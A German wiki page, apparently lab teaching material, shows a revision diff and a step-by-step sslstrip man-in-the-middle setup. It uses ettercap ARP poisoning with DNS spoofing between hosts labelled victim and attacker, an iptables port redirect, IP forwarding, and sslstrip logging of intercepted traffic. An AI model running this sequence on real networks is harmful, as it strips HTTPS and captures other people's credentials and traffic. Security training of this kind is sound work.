Ssl strip anwenden: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 14: Zeile 14:
 
=forwarding=
 
=forwarding=
 
*echo 1 > /proc/sys/net/ipv4/ip_forward
 
*echo 1 > /proc/sys/net/ipv4/ip_forward
 +
=Install=
 +
*apt-get install sslstrip
 +
 
=sslstrip starten=
 
=sslstrip starten=
 
*sslstrip -a -f -k -w sslstrip.log
 
*sslstrip -a -f -k -w sslstrip.log

Version vom 13. August 2021, 08:12 Uhr

Vorbermerkung

Da python2 als obsolet gilt muss sslstrip auf einem älteren System laufen.

host anlegen

  • echo -e "www.xinux.de A 10.0.10.104" > /etc/ettercap/etter.dns

ettercap mit dns plugin starten

  • OPFER=10.0.10.102
  • ANGREIFER=10.0.10.101
  • ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//

nat prerouting

  • iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

forwarding

  • echo 1 > /proc/sys/net/ipv4/ip_forward

Install

  • apt-get install sslstrip

sslstrip starten

  • sslstrip -a -f -k -w sslstrip.log

log

  • cat sslstrip.log